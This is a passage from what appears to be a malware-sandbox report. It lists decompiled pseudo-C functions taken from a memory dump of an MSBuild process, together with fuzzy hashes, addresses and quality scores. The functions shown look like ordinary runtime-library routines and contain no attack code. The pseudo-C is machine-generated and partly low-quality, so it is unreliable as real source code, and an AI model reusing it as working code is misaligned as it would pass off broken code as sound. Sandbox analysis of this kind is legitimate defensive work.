                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3f1d030709f5a25b4b0dec24b7200c8a88163b8f12a0d7c4944e9047a11a4c30
                                                                                                • Instruction ID: 73e9c95109f7f1af3870d3d13f8375f61cc0fc7947793baff371f0264774f471
                                                                                                • Opcode Fuzzy Hash: 3f1d030709f5a25b4b0dec24b7200c8a88163b8f12a0d7c4944e9047a11a4c30
                                                                                                • Instruction Fuzzy Hash: D3012872604746ABC719EF28C900B1A7BE9BB84214F048529F99693390DF30D455CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0115FE3F Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E0115FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x119d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E010EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                0x0115fe3f
                                                                                                0x0115fe3f
                                                                                                0x0115fe4e
                                                                                                0x0115fe58
                                                                                                0x0115fe5d
                                                                                                0x0115fe5f
                                                                                                0x0115fe6a
                                                                                                0x0115fe72
                                                                                                0x0115fe75
                                                                                                0x0115fe78
                                                                                                0x0115fe83
                                                                                                0x0115fe95
                                                                                                0x0115fe85
                                                                                                0x0115fe8e
                                                                                                0x0115fe8e
                                                                                                0x0115fea0
                                                                                                0x0115fea1
                                                                                                0x0115fea3
                                                                                                0x0115fea8
                                                                                                0x0115febd

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 120a2ce8ef1c70a03395e802ff6b3e0b29fbf513ecac0e908e95f2368ccae166
                                                                                                • Instruction ID: 953b9bdd059811747fd712f05d6a7e14c2d76b2bf3f2f975368e6434745192ce
                                                                                                • Opcode Fuzzy Hash: 120a2ce8ef1c70a03395e802ff6b3e0b29fbf513ecac0e908e95f2368ccae166
                                                                                                • Instruction Fuzzy Hash: 76018871A00219AFDB14DFA9D845FAEB7B8EF44700F054066B910DB281DA749941CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0115FEC0 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E0115FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x119d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E010EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                0x0115fec0
                                                                                                0x0115fec0
                                                                                                0x0115fecf
                                                                                                0x0115fed9
                                                                                                0x0115fede
                                                                                                0x0115fee0
                                                                                                0x0115feeb
                                                                                                0x0115fef3
                                                                                                0x0115fef6
                                                                                                0x0115fef9
                                                                                                0x0115ff04
                                                                                                0x0115ff16
                                                                                                0x0115ff06
                                                                                                0x0115ff0f
                                                                                                0x0115ff0f
                                                                                                0x0115ff21
                                                                                                0x0115ff22
                                                                                                0x0115ff24
                                                                                                0x0115ff29
                                                                                                0x0115ff3e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 41f10f917c4d716dae14919a65eec38ffa4d5565e1983bcebf251ee39030ce0f
                                                                                                • Instruction ID: b5fc385969e9156891eb7f11c2a962840680206a479a7cb39efcc7a06035e910
                                                                                                • Opcode Fuzzy Hash: 41f10f917c4d716dae14919a65eec38ffa4d5565e1983bcebf251ee39030ce0f
                                                                                                • Instruction Fuzzy Hash: 6D018471A00209AFDB14DBA9D845FAEBBB8EF45700F444066B911EB280DA749A41CBD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01178A62 Relevance: .0, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 54%
                                                                                                			E01178A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x119d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                0x01178a62
                                                                                                0x01178a71
                                                                                                0x01178a79
                                                                                                0x01178a82
                                                                                                0x01178a85
                                                                                                0x01178a89
                                                                                                0x01178a8c
                                                                                                0x01178a8f
                                                                                                0x01178a92
                                                                                                0x01178a95
                                                                                                0x01178a9f
                                                                                                0x01178ab1
                                                                                                0x01178aa1
                                                                                                0x01178aaa
                                                                                                0x01178aaa
                                                                                                0x01178abc
                                                                                                0x01178abd
                                                                                                0x01178abf
                                                                                                0x01178ac4
                                                                                                0x01178ada

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e2890037ccc5e2e9ac137e2554aca4420d29a5b125fabd85ed78b97a2d9fc9d9
                                                                                                • Instruction ID: 8ccf130c6facb02b0b359be1b4079f9cf07b4c262c0e59bdf32254affd7ea705
                                                                                                • Opcode Fuzzy Hash: e2890037ccc5e2e9ac137e2554aca4420d29a5b125fabd85ed78b97a2d9fc9d9
                                                                                                • Instruction Fuzzy Hash: 22011AB1A00219AFCB04EFA9D9459EEBBB8EF58710F10405AF915E7341D634AA008BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01178ED6 Relevance: .0, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 54%
                                                                                                			E01178ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x119d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E010C7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                                0x01178ed6
                                                                                                0x01178ee5
                                                                                                0x01178eed
                                                                                                0x01178ef0
                                                                                                0x01178efa
                                                                                                0x01178f03
                                                                                                0x01178f0c
                                                                                                0x01178f15
                                                                                                0x01178f24
                                                                                                0x01178f27
                                                                                                0x01178f31
                                                                                                0x01178f43
                                                                                                0x01178f33
                                                                                                0x01178f3c
                                                                                                0x01178f3c
                                                                                                0x01178f4e
                                                                                                0x01178f4f
                                                                                                0x01178f51
                                                                                                0x01178f56
                                                                                                0x01178f69

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b65e75b2ea171af9e06cf7df500ec337918ec46258ff3fb56484857c51365904
                                                                                                • Instruction ID: 312737ccad2afa5c0004712bdccaac49907f52d8eae576b022bbf34dd42b0cac
                                                                                                • Opcode Fuzzy Hash: b65e75b2ea171af9e06cf7df500ec337918ec46258ff3fb56484857c51365904
                                                                                                • Instruction Fuzzy Hash: 7E111EB0A0020A9FDB04DFA9D545BAEBBF4FF08300F0442AAE519EB381E6349940CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010ADB60 Relevance: .0, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010ADB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E010ADB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E010AE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L010AE8B0(__ecx, _t14, 0xfff);
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                                0x010adb64
                                                                                                0x010adb66
                                                                                                0x010adb6b
                                                                                                0x010adbaa
                                                                                                0x010adb71
                                                                                                0x010adb76
                                                                                                0x010adb7a
                                                                                                0x010adba3
                                                                                                0x010adb7c
                                                                                                0x010adb87
                                                                                                0x010adb8b
                                                                                                0x01104fa1
                                                                                                0x01104fb3
                                                                                                0x01104fb8
                                                                                                0x010adb91
                                                                                                0x010adb96
                                                                                                0x010adb98
                                                                                                0x010adb98
                                                                                                0x010adb8b
                                                                                                0x010adb7a
                                                                                                0x010adb9d
                                                                                                0x010adba2

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                • Instruction ID: 7dd401604745b7dc61ee959e7bfe55b3f05886fa7a8e3087e10f7bdb1255a6f9
                                                                                                • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                • Instruction Fuzzy Hash: B8F0F633211623DBD3326AD988D4FAFBA959FD1AA0F560435F3859BB44CA608C0287E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010AB1E1 Relevance: .0, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010AB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E010C7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E010C7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01127016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                0x010ab1e8
                                                                                                0x010ab1ea
                                                                                                0x010ab1f3
                                                                                                0x01104a17
                                                                                                0x010ab1f9
                                                                                                0x010ab1f9
                                                                                                0x010ab1f9
                                                                                                0x010ab201
                                                                                                0x01104a21
                                                                                                0x01104a2e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01104a3b
                                                                                                0x01104a4d
                                                                                                0x01104a3d
                                                                                                0x01104a46
                                                                                                0x01104a46
                                                                                                0x01104a55
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010ab20a
                                                                                                0x010ab20a
                                                                                                0x010ab20a
                                                                                                0x010ab20a

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                • Instruction ID: b82122290957132c440aee3262738c7f0ee145da36063e21f0dea556b166d756
                                                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                • Instruction Fuzzy Hash: 9601F432600680DBD327A7ADC844F6A7BD8EF91754F0900A2FA558BAF2DBB8CC40C715
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0113FE87 Relevance: .0, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E0113FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x119d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E010C7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                                0x0113fe96
                                                                                                0x0113fe9e
                                                                                                0x0113fea1
                                                                                                0x0113fead
                                                                                                0x0113feb3
                                                                                                0x0113feb9
                                                                                                0x0113fec3
                                                                                                0x0113fed5
                                                                                                0x0113fec5
                                                                                                0x0113fece
                                                                                                0x0113fece
                                                                                                0x0113fee0
                                                                                                0x0113fee1
                                                                                                0x0113fee3
                                                                                                0x0113fee8
                                                                                                0x0113fefb

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9d8773d89eaf01ab815250627817a33cddc6a5b7c591081cab0809693dd9371f
                                                                                                • Instruction ID: 110fe2479af78225bb04197306122edee44daff14d88536533aa4d17d629635b
                                                                                                • Opcode Fuzzy Hash: 9d8773d89eaf01ab815250627817a33cddc6a5b7c591081cab0809693dd9371f
                                                                                                • Instruction Fuzzy Hash: 81016270A00209AFCB14DFA8D546AAEB7F4FF08704F144169B555DB382D635DA02CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0116131B Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 48%
                                                                                                			E0116131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x119d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                0x0116131b
                                                                                                0x0116132a
                                                                                                0x01161330
                                                                                                0x01161336
                                                                                                0x0116133e
                                                                                                0x01161341
                                                                                                0x01161344
                                                                                                0x0116134f
                                                                                                0x01161361
                                                                                                0x01161351
                                                                                                0x0116135a
                                                                                                0x0116135a
                                                                                                0x0116136c
                                                                                                0x0116136d
                                                                                                0x0116136f
                                                                                                0x01161374
                                                                                                0x01161387

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dd68a16a619e632aa2dc7562130d9c2e0f44895121051de41ffef7b9cf3ce54a
                                                                                                • Instruction ID: 67f41e012fb3be631370012dcf77261bef652cf4c5fa57d0ed09d3f464dba00f
                                                                                                • Opcode Fuzzy Hash: dd68a16a619e632aa2dc7562130d9c2e0f44895121051de41ffef7b9cf3ce54a
                                                                                                • Instruction Fuzzy Hash: 8C01AFB1A0420DAFCB04EFA9D505AAEB7F4FF48700F004069F855EB381E634DA00CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D6B90 Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E010D6B90(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t11;
				signed int _t12;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;

				_t21 = _a4;
				_t19 =  *_t21;
				if(_t19 != 0) {
					if(_t19 < 0x1fff) {
						_t19 = _t19 + _t19;
					}
					L3:
					 *_t21 = _t19;
					asm("rdtsc");
					_v8 = 0;
					_t12 = _t11 & _t19 - 0x00000001;
					_t20 = _t19 + _t12;
					if(_t20 == 0) {
						L5:
						return _t12;
					} else {
						goto L4;
					}
					do {
						L4:
						asm("pause");
						_t12 = _v8 + 1;
						_v8 = _t12;
					} while (_t12 < _t20);
					goto L5;
				}
				_t12 =  *( *[fs:0x18] + 0x30);
				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
					goto L5;
				}
				_t19 = 0x40;
				goto L3;
			}









                                                                                                0x010d6b96
                                                                                                0x010d6b99
                                                                                                0x010d6b9d
                                                                                                0x010d6be9
                                                                                                0x010d6beb
                                                                                                0x010d6beb
                                                                                                0x010d6bb3
                                                                                                0x010d6bb3
                                                                                                0x010d6bb5
                                                                                                0x010d6bba
                                                                                                0x010d6bc1
                                                                                                0x010d6bc3
                                                                                                0x010d6bc5
                                                                                                0x010d6be0
                                                                                                0x010d6be0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d6bc7
                                                                                                0x010d6bc7
                                                                                                0x010d6bd0
                                                                                                0x010d6bd5
                                                                                                0x010d6bd6
                                                                                                0x010d6bd9
                                                                                                0x00000000
                                                                                                0x010d6bc7
                                                                                                0x010d6ba5
                                                                                                0x010d6bac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d6bae
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                                                                • Instruction ID: a8cf2d03847447066c9721917c197ba6595ab80da75ce2ca0ebeaa3d9d21dff5
                                                                                                • Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                                                                • Instruction Fuzzy Hash: 7CF04975A00208DFDB58CE48C690AACBBB1EB44320F2440A8E5469B700D63A9E84DB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01178F6A Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 48%
                                                                                                			E01178F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x119d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E010C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                0x01178f6a
                                                                                                0x01178f79
                                                                                                0x01178f81
                                                                                                0x01178f84
                                                                                                0x01178f8b
                                                                                                0x01178f91
                                                                                                0x01178f94
                                                                                                0x01178f9e
                                                                                                0x01178fb0
                                                                                                0x01178fa0
                                                                                                0x01178fa9
                                                                                                0x01178fa9
                                                                                                0x01178fbb
                                                                                                0x01178fbc
                                                                                                0x01178fbe
                                                                                                0x01178fc3
                                                                                                0x01178fd6

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d1e17d5e9cd541b1d6a86153030c257643c6725e15b1859c4f48c7ecf7c8c314
                                                                                                • Instruction ID: 070570c1d02648f53ecc13d975ace4ec5a1f7ef27003418b2d17f20143fbc66c
                                                                                                • Opcode Fuzzy Hash: d1e17d5e9cd541b1d6a86153030c257643c6725e15b1859c4f48c7ecf7c8c314
                                                                                                • Instruction Fuzzy Hash: 79013174A00209AFDB04EFB9D545AAEBBF4EF18300F504059B955EB380DA34DE00CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01161608 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E01161608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x119d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E010C7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
